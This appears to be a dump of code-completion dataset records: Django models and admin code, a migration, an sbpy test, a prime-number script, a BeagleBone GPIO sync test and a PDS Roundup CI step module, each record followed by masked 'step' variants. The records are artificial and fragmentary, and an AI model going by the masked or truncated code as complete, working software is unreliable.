\t\t\t\t\t\t\t\t\t\t\t 'socrata_category',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_owner',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_author', \n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_download_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_view_count']}\n # \t\t\t),\n # \t\t\t('GPS Data', {#'classes': ('collapse',),\n # \t\t\t\t\t\t\t\t'fields': [ 'gps_values', 'lat_min', 'lat_max', 'long_min', 'long_max']}\n # \t\t\t),\n # \t\t\t]\n\n list_display = ('database_id', 'name', 'category', 'short_profiler_status', 'socrata_status', \n #'socrata_primary', 'rows', 'columns_count', 'missing_percent', \n 'source_agency',\n 'has_bounding_box')\n search_fields = ('profiler_status','database_id','category','name', 'description','owner','tags',)\n list_filter = ['profiler_status', 'category', 'owner', 'author', 'socrata_status']\n\n prepopulated_fields = {'name': ('database_id',)}\n\n inlines = [ColumnInline\n #, GPSInline\n ]\n \nadmin.site.register(Database, DatabaseAdmin)\n\nclass AlarmAdmin(admin.ModelAdmin):\n list_display = ['name', 'severity', 'query']\n list_filter = ['severity']\n\nadmin.site.register(Alarm, AlarmAdmin)\n\nclass SystemAdmin(admin.ModelAdmin):\n list_display = ['update_time', 'source_file']\n\nadmin.site.register(System, SystemAdmin)\n\n",
"step-ids": [
5,
7,
10,
11,
13
]
}
|
[
5,
7,
10,
11,
13
] |
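The admin configuration above registers each ModelAdmin by calling admin.site.register(...) after the class definition. For reference, a minimal equivalent sketch using Django's @admin.register decorator (the Database, Alarm and System models from finder.models are assumed, as in the original module; columns are trimmed for brevity):

from django.contrib import admin
from finder.models import Database, Alarm, System

@admin.register(Database)
class DatabaseAdmin(admin.ModelAdmin):
    # Same idea as the explicit registration above, shortened for illustration.
    list_display = ('database_id', 'name', 'category')

@admin.register(Alarm)
class AlarmAdmin(admin.ModelAdmin):
    list_display = ['name', 'severity', 'query']

@admin.register(System)
class SystemAdmin(admin.ModelAdmin):
    list_display = ['update_time', 'source_file']

The decorator form keeps the registration next to the class it applies to, which is why it is often preferred when no custom AdminSite instance is involved.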
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.core.urlresolvers import reverse
import datetime
class Document(models.Model):
document = models.FileField(upload_to='documents/')
uploaded_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return str(self.document)
class Assignment(models.Model):
name= models.CharField(max_length=250)
technology= models.CharField(max_length=100)
directory= models.CharField(max_length=500, default="NA")
def __str__(self):
return self.name + '-' + self.technology
class Assestment(models.Model):
name= models.CharField(max_length=250)
technology= models.CharField(max_length=100)
username= models.CharField(max_length=100, default="NA")
date = models.DateTimeField(default=datetime.datetime.now, blank=True)
def __str__(self):
return self.name + '-' + self.technology
class UserProfile(models.Model):
user = models.OneToOneField(User)
email = models.CharField(max_length=100)
phone = models.IntegerField(default=0)
city = models.CharField(max_length=100)
def create_profile(sender, **kwargs):
if kwargs['created']:
user_profile = UserProfile.objects.create(user=kwargs['instance'])
post_save.connect(create_profile, sender=User)
|
normal
|
{
"blob_id": "01b14da7d081a67bab6f9921bb1a6a4c3d5ac216",
"index": 3003,
"step-1": "<mask token>\n\n\nclass Assignment(models.Model):\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass Assestment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n username = models.CharField(max_length=100, default='NA')\n date = models.DateTimeField(default=datetime.datetime.now, blank=True)\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n email = models.CharField(max_length=100)\n phone = models.IntegerField(default=0)\n city = models.CharField(max_length=100)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Assignment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n directory = models.CharField(max_length=500, default='NA')\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass Assestment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n username = models.CharField(max_length=100, default='NA')\n date = models.DateTimeField(default=datetime.datetime.now, blank=True)\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n email = models.CharField(max_length=100)\n phone = models.IntegerField(default=0)\n city = models.CharField(max_length=100)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Document(models.Model):\n document = models.FileField(upload_to='documents/')\n uploaded_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return str(self.document)\n\n\nclass Assignment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n directory = models.CharField(max_length=500, default='NA')\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass Assestment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n username = models.CharField(max_length=100, default='NA')\n date = models.DateTimeField(default=datetime.datetime.now, blank=True)\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n email = models.CharField(max_length=100)\n phone = models.IntegerField(default=0)\n city = models.CharField(max_length=100)\n\n\n<mask token>\n",
"step-4": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.core.urlresolvers import reverse\nimport datetime\n\n\nclass Document(models.Model):\n document = models.FileField(upload_to='documents/')\n uploaded_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return str(self.document)\n\n\nclass Assignment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n directory = models.CharField(max_length=500, default='NA')\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass Assestment(models.Model):\n name = models.CharField(max_length=250)\n technology = models.CharField(max_length=100)\n username = models.CharField(max_length=100, default='NA')\n date = models.DateTimeField(default=datetime.datetime.now, blank=True)\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n email = models.CharField(max_length=100)\n phone = models.IntegerField(default=0)\n city = models.CharField(max_length=100)\n\n\ndef create_profile(sender, **kwargs):\n if kwargs['created']:\n user_profile = UserProfile.objects.create(user=kwargs['instance'])\n\n\npost_save.connect(create_profile, sender=User)\n",
"step-5": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.core.urlresolvers import reverse\nimport datetime\n\n\nclass Document(models.Model):\n document = models.FileField(upload_to='documents/')\n uploaded_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return str(self.document)\n\n\nclass Assignment(models.Model):\n name= models.CharField(max_length=250)\n technology= models.CharField(max_length=100)\n directory= models.CharField(max_length=500, default=\"NA\")\n\n def __str__(self):\n return self.name + '-' + self.technology\n\n\nclass Assestment(models.Model):\n name= models.CharField(max_length=250)\n technology= models.CharField(max_length=100)\n username= models.CharField(max_length=100, default=\"NA\")\n date = models.DateTimeField(default=datetime.datetime.now, blank=True)\n\n\n def __str__(self):\n return self.name + '-' + self.technology\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n email = models.CharField(max_length=100)\n phone = models.IntegerField(default=0)\n city = models.CharField(max_length=100)\n\n\n\ndef create_profile(sender, **kwargs):\n if kwargs['created']:\n user_profile = UserProfile.objects.create(user=kwargs['instance'])\n\n\npost_save.connect(create_profile, sender=User)",
"step-ids": [
7,
8,
11,
14,
15
]
}
|
[
7,
8,
11,
14,
15
] |
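The create_profile function above is wired up with post_save.connect(create_profile, sender=User). A sketch of the same hookup written with Django's @receiver decorator from django.dispatch (UserProfile is the model defined above; this is an alternative illustration, not part of the original module):

from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver

@receiver(post_save, sender=User)
def create_profile(sender, instance, created, **kwargs):
    # Only create the companion profile when the User row is first inserted.
    if created:
        UserProfile.objects.create(user=instance)

Functionally this matches the explicit connect() call; the decorator simply keeps the wiring next to the handler.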
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Member',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('email', models.EmailField(max_length=75)),
('total_subscription', models.IntegerField(default=0)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MemberSubscription',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('member', models.ForeignKey(to='members.Member')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('subreddit', models.CharField(max_length=200)),
('count', models.IntegerField(default=5)),
],
options={
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name='subscription',
unique_together=set([('subreddit', 'count')]),
),
migrations.AddField(
model_name='membersubscription',
name='subscription',
field=models.ForeignKey(to='members.Subscription'),
preserve_default=True,
),
migrations.AddField(
model_name='member',
name='subscription',
field=models.ManyToManyField(to='members.Subscription', through='members.MemberSubscription'),
preserve_default=True,
),
]
|
normal
|
{
"blob_id": "4e383130b185c6147315517d166ffe66be1be40d",
"index": 4577,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = []\n operations = [migrations.CreateModel(name='Member', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('email', models.EmailField(max_length=75\n )), ('total_subscription', models.IntegerField(default=0))],\n options={}, bases=(models.Model,)), migrations.CreateModel(name=\n 'MemberSubscription', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), (\n 'member', models.ForeignKey(to='members.Member'))], options={},\n bases=(models.Model,)), migrations.CreateModel(name='Subscription',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('subreddit', models.\n CharField(max_length=200)), ('count', models.IntegerField(default=5\n ))], options={}, bases=(models.Model,)), migrations.\n AlterUniqueTogether(name='subscription', unique_together=set([(\n 'subreddit', 'count')])), migrations.AddField(model_name=\n 'membersubscription', name='subscription', field=models.ForeignKey(\n to='members.Subscription'), preserve_default=True), migrations.\n AddField(model_name='member', name='subscription', field=models.\n ManyToManyField(to='members.Subscription', through=\n 'members.MemberSubscription'), preserve_default=True)]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = []\n operations = [migrations.CreateModel(name='Member', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('email', models.EmailField(max_length=75\n )), ('total_subscription', models.IntegerField(default=0))],\n options={}, bases=(models.Model,)), migrations.CreateModel(name=\n 'MemberSubscription', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), (\n 'member', models.ForeignKey(to='members.Member'))], options={},\n bases=(models.Model,)), migrations.CreateModel(name='Subscription',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('subreddit', models.\n CharField(max_length=200)), ('count', models.IntegerField(default=5\n ))], options={}, bases=(models.Model,)), migrations.\n AlterUniqueTogether(name='subscription', unique_together=set([(\n 'subreddit', 'count')])), migrations.AddField(model_name=\n 'membersubscription', name='subscription', field=models.ForeignKey(\n to='members.Subscription'), preserve_default=True), migrations.\n AddField(model_name='member', name='subscription', field=models.\n ManyToManyField(to='members.Subscription', through=\n 'members.MemberSubscription'), preserve_default=True)]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Member',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('email', models.EmailField(max_length=75)),\n ('total_subscription', models.IntegerField(default=0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='MemberSubscription',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('member', models.ForeignKey(to='members.Member')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Subscription',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('subreddit', models.CharField(max_length=200)),\n ('count', models.IntegerField(default=5)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='subscription',\n unique_together=set([('subreddit', 'count')]),\n ),\n migrations.AddField(\n model_name='membersubscription',\n name='subscription',\n field=models.ForeignKey(to='members.Subscription'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='member',\n name='subscription',\n field=models.ManyToManyField(to='members.Subscription', through='members.MemberSubscription'),\n preserve_default=True,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.mark.remote_data
def test_from_sbdb():
""" test from_horizons method"""
data = Phys.from_sbdb('Ceres')
assert len(data.table) == 1
data = Phys.from_sbdb([(n + 1) for n in range(5)])
assert len(data.table) == 5
<|reserved_special_token_1|>
import pytest
from sbpy.data import Phys
from sbpy import bib
@pytest.mark.remote_data
def test_from_sbdb():
""" test from_horizons method"""
data = Phys.from_sbdb('Ceres')
assert len(data.table) == 1
data = Phys.from_sbdb([(n + 1) for n in range(5)])
assert len(data.table) == 5
<|reserved_special_token_1|>
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import pytest
from sbpy.data import Phys
from sbpy import bib
@pytest.mark.remote_data
def test_from_sbdb():
""" test from_horizons method"""
# query one object
data = Phys.from_sbdb('Ceres')
assert len(data.table) == 1
# query several objects
data = Phys.from_sbdb([n+1 for n in range(5)])
assert len(data.table) == 5
|
flexible
|
{
"blob_id": "0bfb089556bfa253bf139f03cd3079ced962d858",
"index": 1021,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]_data\ndef test_from_sbdb():\n \"\"\" test from_horizons method\"\"\"\n data = Phys.from_sbdb('Ceres')\n assert len(data.table) == 1\n data = Phys.from_sbdb([(n + 1) for n in range(5)])\n assert len(data.table) == 5\n",
"step-3": "import pytest\nfrom sbpy.data import Phys\nfrom sbpy import bib\n\n\[email protected]_data\ndef test_from_sbdb():\n \"\"\" test from_horizons method\"\"\"\n data = Phys.from_sbdb('Ceres')\n assert len(data.table) == 1\n data = Phys.from_sbdb([(n + 1) for n in range(5)])\n assert len(data.table) == 5\n",
"step-4": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport pytest\n\nfrom sbpy.data import Phys\nfrom sbpy import bib\n\n\[email protected]_data\ndef test_from_sbdb():\n \"\"\" test from_horizons method\"\"\"\n\n # query one object\n data = Phys.from_sbdb('Ceres')\n assert len(data.table) == 1\n\n # query several objects\n data = Phys.from_sbdb([n+1 for n in range(5)])\n assert len(data.table) == 5\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def nth_prime(n):
ans = 2
known = []
for _ in range(n):
while not all(ans % x != 0 for x in known):
ans += 1
known.append(ans)
return ans
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def nth_prime(n):
ans = 2
known = []
for _ in range(n):
while not all(ans % x != 0 for x in known):
ans += 1
known.append(ans)
return ans
if __name__ == '__main__':
n = int(input('Which one? '))
print(nth_prime(n))
<|reserved_special_token_1|>
#!/usr/bin/env python3
def nth_prime(n):
ans = 2
known = []
for _ in range(n):
while not all(ans%x != 0 for x in known):
ans += 1
known.append(ans)
return ans
if __name__ == "__main__":
n = int(input("Which one? "))
print(nth_prime(n))
|
flexible
|
{
"blob_id": "21fb9622add4d19b2914118e3afd3867b2368a50",
"index": 4913,
"step-1": "<mask token>\n",
"step-2": "def nth_prime(n):\n ans = 2\n known = []\n for _ in range(n):\n while not all(ans % x != 0 for x in known):\n ans += 1\n known.append(ans)\n return ans\n\n\n<mask token>\n",
"step-3": "def nth_prime(n):\n ans = 2\n known = []\n for _ in range(n):\n while not all(ans % x != 0 for x in known):\n ans += 1\n known.append(ans)\n return ans\n\n\nif __name__ == '__main__':\n n = int(input('Which one? '))\n print(nth_prime(n))\n",
"step-4": "#/usr/bin/env python3\n\ndef nth_prime(n):\n ans = 2\n known = []\n for _ in range(n):\n while not all(ans%x != 0 for x in known):\n ans += 1\n known.append(ans)\n return ans\n\nif __name__ == \"__main__\":\n n = int(input(\"Which one? \"))\n print(nth_prime(n))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import Adafruit_BBIO.GPIO as GPIO
from pydrs import SerialDRS
import time
import sys
sys.dont_write_bytecode = True
class SyncRecv:
def __init__(self):
self._comport = '/dev/ttyUSB0'
self._baudrate = '115200'
self._epwm_sync_pin = 'GPIO2_23' # Input in BBB perspective
self._sync_in_pin = 'GPIO2_25' # Input in BBB perspective
self._sync_out_pin = 'GPIO1_14' # Output in BBB perspective
self.setup_pins()
def setup_pins(self):
GPIO.setup(self._epwm_sync_pin, GPIO.IN)
GPIO.setup(self._sync_in_pin, GPIO.IN)
GPIO.setup(self._sync_out_pin, GPIO.OUT)
def do_syncrecv_test(self):
drs = SerialDRS()
conn = drs.Connect(self._comport, self._baudrate)
if not conn:
print("Erro conexao serial")
return False
print("Iniciando teste dos receptores de fibra - sync")
print('Desliga transmissor sync')
GPIO.output(self._sync_out_pin, GPIO.HIGH) # Desliga transmissor
print('Le receptor sync (Esperado = 1)')
sts_sync_in = GPIO.input(self._sync_in_pin)
print('status: ' + str(sts_sync_in))
if sts_sync_in:
print('Liga transmissor sync')
GPIO.output(self._sync_out_pin, GPIO.LOW)
print('Le receptor sync (Esperado = 0)')
sts_sync_in = GPIO.input(self._sync_in_pin)
print('status: ' + str(sts_sync_in))
if not sts_sync_in:
print('DRS desligando todos os transmissores')
drs.ClearPof()
print('Lendo EPWM sync (Esperado = 1)')
sts_epwm_sync = GPIO.input(self._epwm_sync_pin)
print('status: ' + str(sts_epwm_sync))
if sts_epwm_sync:
print('DRS ligando todos os transmissores')
drs.SetPof()
print('Lendo EPWM sync (Esperado = 0)')
sts_epwm_sync = GPIO.input(self._epwm_sync_pin)
print('status: ' + str(sts_epwm_sync))
if not sts_epwm_sync:
drs.Disconnect()
return True
print("Falha receptores sync")
drs.Disconnect()
return False
|
normal
|
{
"blob_id": "c716f43dbe62f662c60653f09be946a27c3fff66",
"index": 8069,
"step-1": "<mask token>\n\n\nclass SyncRecv:\n\n def __init__(self):\n self._comport = '/dev/ttyUSB0'\n self._baudrate = '115200'\n self._epwm_sync_pin = 'GPIO2_23'\n self._sync_in_pin = 'GPIO2_25'\n self._sync_out_pin = 'GPIO1_14'\n self.setup_pins()\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass SyncRecv:\n\n def __init__(self):\n self._comport = '/dev/ttyUSB0'\n self._baudrate = '115200'\n self._epwm_sync_pin = 'GPIO2_23'\n self._sync_in_pin = 'GPIO2_25'\n self._sync_out_pin = 'GPIO1_14'\n self.setup_pins()\n\n def setup_pins(self):\n GPIO.setup(self._epwm_sync_pin, GPIO.IN)\n GPIO.setup(self._sync_in_pin, GPIO.IN)\n GPIO.setup(self._sync_out_pin, GPIO.OUT)\n\n def do_syncrecv_test(self):\n drs = SerialDRS()\n conn = drs.Connect(self._comport, self._baudrate)\n if not conn:\n print('Erro conexao serial')\n return False\n print('Iniciando teste dos receptores de fibra - sync')\n print('Desliga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.HIGH)\n print('Le receptor sync (Esperado = 1)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if sts_sync_in:\n print('Liga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.LOW)\n print('Le receptor sync (Esperado = 0)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if not sts_sync_in:\n print('DRS desligando todos os transmissores')\n drs.ClearPof()\n print('Lendo EPWM sync (Esperado = 1)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if sts_epwm_sync:\n print('DRS ligando todos os transmissores')\n drs.SetPof()\n print('Lendo EPWM sync (Esperado = 0)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if not sts_epwm_sync:\n drs.Disconnect()\n return True\n print('Falha receptores sync')\n drs.Disconnect()\n return False\n",
"step-3": "<mask token>\nsys.dont_write_bytecode = True\n\n\nclass SyncRecv:\n\n def __init__(self):\n self._comport = '/dev/ttyUSB0'\n self._baudrate = '115200'\n self._epwm_sync_pin = 'GPIO2_23'\n self._sync_in_pin = 'GPIO2_25'\n self._sync_out_pin = 'GPIO1_14'\n self.setup_pins()\n\n def setup_pins(self):\n GPIO.setup(self._epwm_sync_pin, GPIO.IN)\n GPIO.setup(self._sync_in_pin, GPIO.IN)\n GPIO.setup(self._sync_out_pin, GPIO.OUT)\n\n def do_syncrecv_test(self):\n drs = SerialDRS()\n conn = drs.Connect(self._comport, self._baudrate)\n if not conn:\n print('Erro conexao serial')\n return False\n print('Iniciando teste dos receptores de fibra - sync')\n print('Desliga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.HIGH)\n print('Le receptor sync (Esperado = 1)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if sts_sync_in:\n print('Liga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.LOW)\n print('Le receptor sync (Esperado = 0)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if not sts_sync_in:\n print('DRS desligando todos os transmissores')\n drs.ClearPof()\n print('Lendo EPWM sync (Esperado = 1)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if sts_epwm_sync:\n print('DRS ligando todos os transmissores')\n drs.SetPof()\n print('Lendo EPWM sync (Esperado = 0)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if not sts_epwm_sync:\n drs.Disconnect()\n return True\n print('Falha receptores sync')\n drs.Disconnect()\n return False\n",
"step-4": "import Adafruit_BBIO.GPIO as GPIO\nfrom pydrs import SerialDRS\nimport time\nimport sys\nsys.dont_write_bytecode = True\n\n\nclass SyncRecv:\n\n def __init__(self):\n self._comport = '/dev/ttyUSB0'\n self._baudrate = '115200'\n self._epwm_sync_pin = 'GPIO2_23'\n self._sync_in_pin = 'GPIO2_25'\n self._sync_out_pin = 'GPIO1_14'\n self.setup_pins()\n\n def setup_pins(self):\n GPIO.setup(self._epwm_sync_pin, GPIO.IN)\n GPIO.setup(self._sync_in_pin, GPIO.IN)\n GPIO.setup(self._sync_out_pin, GPIO.OUT)\n\n def do_syncrecv_test(self):\n drs = SerialDRS()\n conn = drs.Connect(self._comport, self._baudrate)\n if not conn:\n print('Erro conexao serial')\n return False\n print('Iniciando teste dos receptores de fibra - sync')\n print('Desliga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.HIGH)\n print('Le receptor sync (Esperado = 1)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if sts_sync_in:\n print('Liga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.LOW)\n print('Le receptor sync (Esperado = 0)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n if not sts_sync_in:\n print('DRS desligando todos os transmissores')\n drs.ClearPof()\n print('Lendo EPWM sync (Esperado = 1)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if sts_epwm_sync:\n print('DRS ligando todos os transmissores')\n drs.SetPof()\n print('Lendo EPWM sync (Esperado = 0)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if not sts_epwm_sync:\n drs.Disconnect()\n return True\n print('Falha receptores sync')\n drs.Disconnect()\n return False\n",
"step-5": "import Adafruit_BBIO.GPIO as GPIO\nfrom pydrs import SerialDRS\nimport time\nimport sys\n\nsys.dont_write_bytecode = True\n\nclass SyncRecv:\n\n def __init__(self):\n self._comport = '/dev/ttyUSB0'\n self._baudrate = '115200'\n self._epwm_sync_pin = 'GPIO2_23' # Input in BBB perspective\n self._sync_in_pin = 'GPIO2_25' # Input in BBB perspective\n self._sync_out_pin = 'GPIO1_14' # Output in BBB perspective\n\n self.setup_pins()\n\n def setup_pins(self):\n GPIO.setup(self._epwm_sync_pin, GPIO.IN)\n GPIO.setup(self._sync_in_pin, GPIO.IN)\n\n GPIO.setup(self._sync_out_pin, GPIO.OUT)\n\n def do_syncrecv_test(self):\n\n drs = SerialDRS()\n conn = drs.Connect(self._comport, self._baudrate)\n\n if not conn:\n print(\"Erro conexao serial\")\n return False\n\n print(\"Iniciando teste dos receptores de fibra - sync\")\n print('Desliga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.HIGH) # Desliga transmissor\n\n print('Le receptor sync (Esperado = 1)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n\n if sts_sync_in:\n\n print('Liga transmissor sync')\n GPIO.output(self._sync_out_pin, GPIO.LOW)\n print('Le receptor sync (Esperado = 0)')\n sts_sync_in = GPIO.input(self._sync_in_pin)\n print('status: ' + str(sts_sync_in))\n\n if not sts_sync_in:\n\n print('DRS desligando todos os transmissores')\n drs.ClearPof()\n\n print('Lendo EPWM sync (Esperado = 1)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if sts_epwm_sync:\n\n print('DRS ligando todos os transmissores')\n drs.SetPof()\n print('Lendo EPWM sync (Esperado = 0)')\n sts_epwm_sync = GPIO.input(self._epwm_sync_pin)\n print('status: ' + str(sts_epwm_sync))\n if not sts_epwm_sync:\n drs.Disconnect()\n return True\n print(\"Falha receptores sync\")\n drs.Disconnect()\n return False\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
# encoding: utf-8
'''🤠 PDS Roundup: A step takes you further towards a complete roundup'''
from enum import Enum
from .util import commit, invoke
import logging, github3, tempfile, zipfile, os
_logger = logging.getLogger(__name__)
class Step(object):
'''An abstract step; executing steps comprises a roundup'''
def __init__(self, assembly):
'''Initialize a step with the given ``assembly``'''
self.assembly = assembly
def __repr__(self):
return f'<{self.__class__.__name__}()>'
def execute(self):
raise NotImplementedError('Subclasses must implement ``execute``')
def getRepository(self):
'''Utility: get the name of the GitHub repository'''
return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/')[1]
def getToken(self):
'''Utility: get the administrative GitHub token'''
return self.assembly.context.environ.get('ADMIN_GITHUB_TOKEN')
def getOwner(self):
'''Utility: return the owning user/organization of the repository in use'''
return self.assembly.context.environ.get('GITHUB_REPOSITORY').split('/')[0]
class StepName(Enum):
'''Enumerated identifiers for each of the possible steps of a roundup'''
null = 'null'
unitTest = 'unitTest'
integrationTest = 'integrationTest'
changeLog = 'changeLog'
requirements = 'requirements'
docs = 'docs'
build = 'build'
githubRelease = 'githubRelease'
artifactPublication = 'artifactPublication'
docPublication = 'docPublication'
# Common Steps
# ============
#
# The following are concrete Step classes that are shared between contexts;
# i.e., they're independent of Python, Maven, etc.
class NullStep(Step):
'''This is a "null" or "no-op" step that does nothing.'''
def execute(self):
pass
# But for development, this sure is handy:
# import pdb;pdb.set_trace()
# import subprocess
# subprocess.run('/bin/sh')
class ChangeLogStep(Step):
'''This step generates a PDS-style changelog'''
_sections = '{"improvements":{"prefix":"**Improvements:**","labels":["Epic"]},"defects":{"prefix":"**Defects:**","labels":["bug"]},"deprecations":{"prefix":"**Deprecations:**","labels":["deprecation"]}}'
def execute(self):
token = self.getToken()
if not token:
_logger.info('🤷♀️ No GitHub administrative token; cannot generate changelog')
return
invoke([
'github_changelog_generator',
'--user',
self.getOwner(),
'--project',
self.getRepository(),
'--output',
'CHANGELOG.md',
'--token',
token,
'--configure-sections',
self._sections,
'--no-pull-requests',
'--issues-label',
'**Other closed issues:**',
'--issue-line-labels',
'high,low,medium'
])
commit('CHANGELOG.md', 'Update changelog')
class RequirementsStep(Step):
'''This step generates a PDS-style requirements file'''
def execute(self):
token = self.getToken()
if not token:
_logger.info('🤷♀️ No GitHub administrative token; cannot generate requirements')
return
argv = [
'requirement-report',
'--format',
'md',
'--organization',
self.getOwner(),
'--repository',
self.getRepository(),
'--output',
'docs/requirements/',
'--token',
token
]
if not self.assembly.isStable():
argv.append('--dev')
generatedFile = invoke(argv).strip()
if not generatedFile:
_logger.warn('🤨 Did not get a requirements file from the requirement-report; will skip it')
return
commit(generatedFile, 'Update requirements')
class DocPublicationStep(Step):
def getDocDir(self):
raise NotImplementedError('Subclasses must implement ``getDocDir``')
def execute(self):
token = self.getToken()
if not token:
_logger.info('🤷♀️ No GitHub administrative token; cannot send doc artifacts to GitHub')
return
github = github3.login(token=token)
repo = github.repository(self.getOwner(), self.getRepository())
